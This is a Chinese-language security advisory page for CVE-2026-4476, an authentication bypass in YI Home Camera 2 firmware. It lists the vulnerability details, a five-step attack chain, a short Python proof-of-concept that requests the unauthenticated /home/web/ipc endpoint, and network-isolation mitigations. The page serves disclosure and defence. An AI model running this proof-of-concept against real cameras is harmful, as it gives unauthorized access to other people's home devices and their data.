IPBUF安全漏洞报告
English
CVE-2026-4476 CVSS 6.3 中危

CVE-2026-4476: YI Home Camera 2 认证绕过漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4476
漏洞类型
认证绕过
CVSS评分
6.3 中危
攻击向量
邻接 (AV:A)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
YI Technology YI Home Camera 2

相关标签

认证绕过IoTYI Home CameraCGI漏洞邻接网络攻击

漏洞概述

Yi Technology YI Home Camera 2固件版本2.1.1_20171024151200存在认证绕过漏洞。由于CGI端点处理逻辑缺陷,未实施有效的身份验证机制,处于本地网络的攻击者可直接访问特定接口,导致设备信息泄露及服务异常,影响设备安全性。

技术细节

该漏洞根源在于YI Home Camera 2设备中`home/web/ipc`组件的CGI端点未对用户请求进行严格的身份验证检查。由于存在逻辑缺陷,攻击者在无需交互且无需提供任何凭证的情况下,仅需接入设备所在的局域网(邻接网络),即可向目标端点发送特制的HTTP请求。成功利用此漏洞可导致认证机制完全失效,攻击者进而非法获取敏感信息、篡改系统配置或干扰设备正常运行。鉴于CVSS向量AV:A,该攻击仅限本地网络环境,且厂商目前尚未提供修复补丁。

攻击链分析

STEP 1
步骤1:网络接入
攻击者需要接入目标设备所在的本地局域网(邻接网络环境)。
STEP 2
步骤2:识别目标
扫描网络并识别存在漏洞的YI Home Camera 2设备。
STEP 3
步骤3:发送恶意请求
向设备的`/home/web/ipc` CGI端点发送未经认证的HTTP请求。
STEP 4
步骤4:绕过认证
设备端未进行身份校验,直接处理请求,导致攻击者获取访问权限。
STEP 5
步骤5:执行操作
利用获取的权限读取信息、修改配置或中断服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_cve_2026_4476(target_ip): """ PoC for CVE-2026-4476 Authentication Bypass Target: Yi Technology YI Home Camera 2 """ # The vulnerable endpoint identified in the advisory url = f"http://{target_ip}/home/web/ipc" try: # Sending a request without authentication headers response = requests.get(url, timeout=5) if response.status_code == 200: print("[+] Exploit successful! Authentication bypassed.") print(f"[+] Response: {response.text[:100]}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": target = "192.168.1.100" # Replace with actual target IP exploit_cve_2026_4476(target)

影响范围

YI Technology YI Home Camera 2 2.1.1_20171024151200

防御指南

临时缓解措施
由于厂商尚未回应,建议通过网络隔离措施进行缓解。将受影响的摄像头放置在独立的VLAN中,仅允许必要的访问流量,并监控局域网内的异常流量。如果可能,应暂时断开设备网络连接直至补丁发布。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表